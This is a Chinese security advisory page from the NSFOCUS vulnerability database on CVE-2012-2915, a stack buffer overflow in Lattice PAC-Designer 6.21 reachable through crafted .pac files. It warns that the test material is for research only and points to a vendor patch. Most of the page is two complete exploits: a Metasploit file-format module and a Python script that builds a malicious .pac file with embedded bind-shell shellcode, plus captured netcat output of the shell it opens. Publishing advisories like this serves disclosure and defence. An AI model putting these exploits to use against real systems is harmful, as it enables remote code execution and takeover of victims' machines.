绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

PAC-Designer '.pac'文件缓冲区溢出漏洞

发布日期：2012-05-16
更新日期：2012-06-17

受影响系统：

Lattice Semiconductor PAC-Designer 6.2.1344

描述：

BUGTRAQ ID: 53566
CVE(CAN) ID: CVE-2012-2915

PAC-Designer是针对电源和时钟管理的简单、灵活、高效的工具。

PAC-Designer 6.2.1344存在栈缓冲区溢出漏洞，远程攻击者利用.pac文件内的SymbolicSchematicData定义标签内较长的Value标签字符串，可执行任意代码。

<*来源：anonymous
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://downloads.securityfocus.com/vulnerabilities/exploits/53566.py
http://downloads.securityfocus.com/vulnerabilities/exploits/53566.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
        6.21.  As a .pac file, when supplying a long string of data to the 'value' field
        under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
        on the stack, which results in arbitrary code execution under the context of the
        user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      #Discovery
          'juan vazquez', #Metasploit
          'sinn3r'        #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-2915'],
          ['OSVDB', '82001'],
          ['EDB', '19006'],
          ['BID', '53566'],
          ['URL', 'http://secunia.com/advisories/48741']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x3c\x3e",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "seh"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'PAC-Designer 6.21 on Windows XP SP3',
            {
              # P/P/R in PACD621.exe
              # ASLR: False, Rebase: False, SafeSEH: False, OS: False
              'Ret' => 0x00805020
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 16 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
      ], self.class)
  end

  def exploit
    # The payload is placed in the <title> field
    p = payload.encoded

    # The trigger is placed in the <value> field, which will jmp to our
    # payload in the <title> field.
    buf  = "\x5f"    #POP EDI
    buf << "\x5f"    #POP EDI
    buf << "\x5c"    #POP ESP
    buf << "\x61"*6  #POPAD x 6
    buf << "\x51"    #PUSH ECX
    buf << "\xc3"    #RET
    buf << rand_text_alpha(96-buf.length, payload_badchars)
    buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"  #Jmp back to the beginning of the buffer
    buf << [target.ret].pack('V')[0,3] # Partial overwrite

    xml = %Q|<?xml version="1.0"?>
<PacDesignData>
  <DocFmtVersion>1</DocFmtVersion>
  <DeviceType>ispPAC-CLK5410D</DeviceType>
  <CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
  <SummaryInformation>
    <Title>#{p}</Title>
    <Author>#{Rex::Text.rand_text_alpha(6)}</Author>
  </SummaryInformation>

  <SymbolicSchematicData>
    <Symbol>
      <SymKey>153</SymKey>
      <NameText>Profile 0 Ref Frequency</NameText>
      <Value>#{buf}</Value>
    </Symbol>
  </SymbolicSchematicData>
</PacDesignData>|

    file_create(xml)
  end
end

#!/usr/bin/python -w

#------------------------------------------------------------------------------------#
# Exploit: Lattice Semiconductor PAC-Designer 6.21 (possibly all versions)           #
# CVE: CVE-2012-2915                                                                 #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                        #
# OS: WinXP SP1                                                                      #
# Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm #
#------------------------------------------------------------------------------------#
# I didn't dig to deep but it seems portability to other OS builds is not promising  #
# due to SafeSEH and badchars in the application modules.                            #
#------------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.130 9988                                             #
#  (UNKNOWN) [192.168.111.130] 9988 (?) open                                         #
#  Microsoft Windows XP [Version 5.1.2600]                                           #
#  (C) Copyright 1985-2001 Microsoft Corp.                                           #
#                                                                                    #
#  C:\Documents and Settings\Owner\Desktop>                                          #
#------------------------------------------------------------------------------------#

filename="evil.PAC"

PAC1 = """<?xml version="1.0"?>

<PacDesignData>

<DocFmtVersion>1</DocFmtVersion>
<DeviceType>ispPAC-CLK5410D</DeviceType>

<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>

<SummaryInformation>
<Title>Oops..</Title>
<Author>b33f</Author>
</SummaryInformation>

<SymbolicSchematicData>
  <Symbol>
    <SymKey>153</SymKey>
    <NameText>Profile 0 Ref Frequency</NameText>
    <Value>"""

#------------------------------------------------------------------------------------#
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c  #
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)                          #
#------------------------------------------------------------------------------------#
shellcode = (
"\x89\xe3\xd9\xd0\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x59\x78\x4e\x69\x35\x50\x35\x50\x57\x70\x53\x50\x6b"
"\x39\x6a\x45\x35\x61\x38\x52\x73\x54\x4c\x4b\x36\x32\x70\x30"
"\x4e\x6b\x56\x32\x36\x6c\x6e\x6b\x72\x72\x32\x34\x6e\x6b\x33"
"\x42\x66\x48\x56\x6f\x38\x37\x61\x5a\x45\x76\x56\x51\x59\x6f"
"\x45\x61\x59\x50\x6e\x4c\x67\x4c\x73\x51\x73\x4c\x74\x42\x46"
"\x4c\x45\x70\x4b\x71\x58\x4f\x54\x4d\x63\x31\x69\x57\x78\x62"
"\x7a\x50\x46\x32\x63\x67\x6e\x6b\x70\x52\x66\x70\x4e\x6b\x30"
"\x42\x47\x4c\x76\x61\x6e\x30\x4e\x6b\x57\x30\x73\x48\x4b\x35"
"\x69\x50\x72\x54\x53\x7a\x75\x51\x6e\x30\x36\x30\x6e\x6b\x72"
"\x68\x55\x48\x6e\x6b\x30\x58\x31\x30\x65\x51\x5a\x73\x7a\x43"
"\x75\x6c\x72\x69\x6c\x4b\x64\x74\x4c\x4b\x45\x51\x6a\x76\x74"
"\x71\x79\x6f\x76\x51\x4f\x30\x6c\x6c\x69\x51\x6a\x6f\x64\x4d"
"\x35\x51\x69\x57\x45\x68\x4d\x30\x74\x35\x6b\x44\x75\x53\x73"
"\x4d\x49\x68\x67\x4b\x61\x6d\x45\x74\x30\x75\x69\x72\x32\x78"
"\x4c\x4b\x51\x48\x36\x44\x55\x51\x38\x53\x51\x76\x6c\x4b\x66"
"\x6c\x42\x6b\x6c\x4b\x66\x38\x37\x6c\x66\x61\x38\x53\x4e\x6b"
"\x63\x34\x6c\x4b\x67\x71\x48\x50\x6d\x59\x72\x64\x56\x44\x74"
"\x64\x33\x6b\x31\x4b\x53\x51\x66\x39\x62\x7a\x72\x71\x59\x6f"
"\x4b\x50\x33\x68\x31\x4f\x62\x7a\x4c\x4b\x35\x42\x4a\x4b\x6d"
"\x56\x31\x4d\x42\x48\x36\x53\x30\x32\x57\x70\x33\x30\x42\x48"
"\x71\x67\x52\x53\x57\x42\x43\x6f\x71\x44\x42\x48\x50\x4c\x43"
"\x47\x71\x36\x53\x37\x79\x6f\x58\x55\x58\x38\x6a\x30\x56\x61"
"\x65\x50\x73\x30\x76\x49\x6a\x64\x43\x64\x30\x50\x52\x48\x47"
"\x59\x4d\x50\x30\x6b\x57\x70\x39\x6f\x6e\x35\x72\x70\x76\x30"
"\x52\x70\x36\x30\x31\x50\x36\x30\x43\x70\x76\x30\x32\x48\x69"
"\x7a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x79\x45\x6e\x69\x4a\x67"
"\x34\x71\x49\x4b\x62\x73\x43\x58\x63\x32\x77\x70\x56\x47\x76"
"\x64\x6d\x59\x79\x76\x32\x4a\x56\x70\x32\x76\x61\x47\x63\x58"
"\x38\x42\x4b\x6b\x67\x47\x53\x57\x59\x6f\x4e\x35\x31\x43\x76"
"\x37\x33\x58\x48\x37\x69\x79\x35\x68\x69\x6f\x79\x6f\x6e\x35"
"\x30\x53\x31\x43\x63\x67\x35\x38\x51\x64\x38\x6c\x75\x6b\x49"
"\x71\x59\x6f\x79\x45\x43\x67\x6c\x49\x5a\x67\x42\x48\x52\x55"
"\x30\x6e\x70\x4d\x61\x71\x79\x6f\x58\x55\x32\x48\x33\x53\x30"
"\x6d\x33\x54\x43\x30\x4e\x69\x49\x73\x56\x37\x33\x67\x62\x77"
"\x54\x71\x59\x66\x71\x7a\x57\x62\x32\x79\x36\x36\x38\x62\x6b"
"\x4d\x61\x76\x58\x47\x51\x54\x74\x64\x57\x4c\x75\x51\x55\x51"
"\x6e\x6d\x77\x34\x46\x44\x44\x50\x68\x46\x37\x70\x50\x44\x31"
"\x44\x76\x30\x72\x76\x61\x46\x72\x76\x50\x46\x43\x66\x72\x6e"
"\x31\x46\x76\x36\x71\x43\x30\x56\x33\x58\x43\x49\x38\x4c\x47"
"\x4f\x6c\x46\x59\x6f\x6b\x65\x4f\x79\x79\x70\x32\x6e\x32\x76"
"\x57\x36\x39\x6f\x70\x30\x43\x58\x45\x58\x4b\x37\x35\x4d\x73"
"\x50\x79\x6f\x6e\x35\x4d\x6b\x6c\x30\x6c\x75\x79\x32\x73\x66"
"\x62\x48\x6f\x56\x4c\x55\x4d\x6d\x6d\x4d\x39\x6f\x6a\x75\x65"
"\x6c\x47\x76\x73\x4c\x64\x4a\x6d\x50\x79\x6b\x49\x70\x33\x45"
"\x54\x45\x4f\x4b\x63\x77\x47\x63\x33\x42\x72\x4f\x51\x7a\x37"
"\x70\x30\x53\x79\x6f\x68\x55\x41\x41")

#------------------------------------------------------------------------------------#
# SEH: 0x77512879 : pop esi # pop ecx # ret - SHELL32.dll                            #
# nSEH: \xEB\x05                                                                     #
#------------------------------------------------------------------------------------#
b00m = "\x90"*20 + shellcode
payload = "A"*98 + "\xEB\x05\x79\x28\x51\x77" + b00m + "C"*(5000-len(b00m))

PAC2 = """</Value>
  </Symbol>
</SymbolicSchematicData>

</PacDesignData>"""

buffer = PAC1 + payload + PAC2

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

建议：

厂商补丁：

Lattice Semiconductor
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.latticesemi.com/zh-CN/Products/DesignSoftwareAndIP/MixedSignalDS/PacDesigner.aspx

浏览次数：1717
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客